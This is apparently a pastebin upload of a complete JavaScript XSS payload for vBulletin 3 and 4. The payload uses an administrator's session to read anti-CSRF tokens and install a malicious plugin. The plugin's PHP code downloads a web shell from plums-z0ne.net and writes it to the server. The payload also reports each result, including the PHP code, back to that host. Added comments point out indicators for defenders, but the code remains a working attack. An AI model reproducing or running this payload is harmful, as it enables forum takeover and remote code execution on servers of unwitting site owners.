Untitled

a guest
Nov 17th, 2019
  1. /*
  2. # vBulletin 3 and 4 XSS Payload
  3. # This payload will allow you to exploit an XSS vulnerability and create a plugin.
  4. #
  5. # Requirements:
  6. # XSS Vulnerability
  7. # Administrator must be logged into admin panel when you get them to execute the payload
  8. #
  9. # Usage:
  10. # Start the payload with the start_payload function
  11. # There are three parameters: url, search, and acpname
  12. # url is obviously the full path to the forum (with trailing slash!)
  13. # search is whether you want to search for the admincp name (boolean)
  14. # acpname is if you already know the admincp name you can specify it here (just the name no slashes)
  15. # start_payload will return false if no admincp directory is found when search is true
  16. # Once the admincp name is either found or provided by the user the create_plugin function will be called
  17. # You can edit the variables in that function to your liking
  18. # I have a simple callback function here as an example to tell me when a plugin has been created.
  19. #
  20. # Example:
  21. # <script src='http://linktoexternalhost.com/payload.js'></script><script>start_payload("http://localhost/forum/", true, null);</script>
  22. #
  23. # @PlumLulz
  24. # plumm@jabber.org
  25. # 2013
  26. #
  27. # Silent but deadly
  28. */
  29.  
  30.  
  31. // Loads jQuery 1.10.2 from the Google CDN into the victim page so the rest of the script can use $.get / $.ajax.
  32. var jq = document.createElement('script');
  33. jq.src = "//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"; // protocol-relative URL: inherits the page's scheme
  34. document.getElementsByTagName('head')[0].appendChild(jq); // a CSP script-src that does not allow ajax.googleapis.com stops the script here
  35.  
  36. // Beacon to the operator's logging endpoint.
  37. // Sends `message` as a query-string parameter in a cross-origin GET to plums-z0ne.net and discards the response; an outbound request from an administrator's browser to that host is the network-level indicator of this script.
  38. function callback(message) {
  39. var url = 'http://plums-z0ne.net/cb.php?cb='+message; // message is appended raw; callers pass the forum URL, the hook name and the PHP code
  40. $.get(url, function (response) {
  41. // response is ignored
  42. });
  43. }
  44.  
  45. // Entry point: resolves the admin-panel directory (by scraping the footer or from acpname) and hands it to create_plugin.
  46. function start_payload(url, search, acpname) {
  47. if(search == true) {
  48. // Discovery mode: fetch the forum index and read the "Admin" link out of the footer.
  49. $.get(url+"index.php", function(response) {
  50. // The footer "Admin" link is presumably only rendered for a logged-in administrator (the header requires one),
  51. // so renaming the admincp directory hides it from outsiders but not from script running inside that admin's session.
  52. // vB4 uses .footer_links and vB3 uses .tfoot, so both markups are checked.
  53. if($(response).find('.footer_links').length) {
  54. // vB4 footer found
  55. // Look at each footer link for Admin
  56. $('.footer_links li', response).each(function() {
  57. // Admincp link found
  58. if($($(this).html()).html() == 'Admin') {
  59. var admincpdir = $($(this).html()).attr('href').replace('index.php' , ''); // directory part of the href, e.g. "admincp/" (constructed example)
  60. create_plugin(url, admincpdir);
  61. return true;
  62. }
  63. });
  64. } else if($(response).find('.tfoot')) {
  65. // vB3 footer found
  66. // Look at each footer link for Admin
  67. $('.tfoot a', response).each(function() {
  68. if($(this).html() == 'Admin') {
  69. var admincpdir = $(this).attr('href').replace('index.php', '');
  70. create_plugin(url, admincpdir);
  71. alert(admincpdir); // shown to the victim: a pop-up containing the admincp path is one of the few user-visible signs of this script running
  72. return true;
  73. }
  74. });
  75. }
  76. if(!admincpdir) {
  77. return false;
  78. }
  79. });
  80. } else {
  81. var admincpdir = acpname+"/"; // acpname is given without slashes (see header); the trailing slash is added here
  82. create_plugin(url, admincpdir);
  83. return true;
  84. }
  85. }
  86.  
  87. // Creates a vBulletin plugin through the admin panel using the victim's authenticated session.
  88. function create_plugin(url, admincpdir) {
  89. // Plugin information: these literal values are what a defender will find when reviewing the plugin list / datastore.
  90. var product = 'vbulletin';
  91. var hookname = 'ajax_start'; // presumably fires on ajax requests; an unexpected plugin on this hook is a strong indicator (confirm against the vBulletin hook list)
  92. var title = 'Pwned By XSS';
  93. var executionorder = '5';
  94. var phpcode = "if(isset($_GET['pwned'])) {if(file_put_contents('pwned.php', file_get_contents('http://plums-z0ne.net/shell2.txt'))) { echo 'pwned'; } }"; // when the hook runs with ?pwned set, the server fetches shell2.txt from plums-z0ne.net and writes it as pwned.php in its working directory: a new PHP file there and server-side egress to that host are the host-level indicators
  95. var active = '1'; // boolean
  96.  
  97. // Same-origin XSS: the add-plugin form is fetched with the victim's cookies, so the anti-CSRF values (adminhash, securitytoken) are read straight out of the form and replayed; token-based CSRF protection does not help against script already running in the origin.
  98. $.get(url+admincpdir+"plugin.php?do=add", function(response) {
  99. var adminhash = $(response).find('input[name="adminhash"]').val();
  100. var securitytoken = $(response).find('input[name="securitytoken"]').val();
  101.  
  102. // Submit the plugin form. In the admin-panel access log this shows up as a GET to plugin.php?do=add immediately followed by a POST to plugin.php?do=update from the same session.
  103. $.ajax({
  104. type: "POST",
  105. url: url+admincpdir+"plugin.php?do=update",
  106. dataType: 'text',
  107. data: {
  108. do:"update",
  109. adminhash:adminhash,
  110. securitytoken:securitytoken,
  111. product:product,
  112. hookname:hookname,
  113. title:title,
  114. executionorder:executionorder,
  115. phpcode:phpcode,
  116. active:active,
  117. pluginid:""
  118. },
  119. error: function (request, textStatus, errorThrown) {
  120. // Per the original author, vB4 lands in the error handler even when the plugin was saved, so the success marker is also searched for in responseText here.
  121. if(request.responseText.search('Saved Plugin Successfully') != -1) {
  122. // Plugin created: report back to the logging endpoint (includes the forum URL, hook name and PHP code).
  123. // This beacon fires after the plugin exists but before anything has triggered it, so the remote fetch of shell2.txt
  124. // only happens once ajax.php is requested with ?pwned.
  125. callback("Plugin created on "+url+" hookname: "+hookname+" phpcode "+phpcode);
  126. }
  127. }
  128. }).done(function(result) {
  129. if(result.search('Saved Plugin Successfully') != -1) {
  130. // Plugin created: same beacon as in the error handler above.
  131. // Either path results in the same GET to plums-z0ne.net/cb.php, so a single egress rule covers both.
  132. // The PHP code is included verbatim in the query string.
  133. callback("Plugin created on "+url+" hookname: "+hookname+" phpcode "+phpcode);
  134. } else {
  135. // No success marker in the response: the victim was not an authenticated administrator at this point.
  136. // The failure is still reported to the logging endpoint, so the beacon is observable even when the plugin was not created.
  137. callback("Failed to create plugin on "+url);
  138. }
  139. });
  140. });
  141. }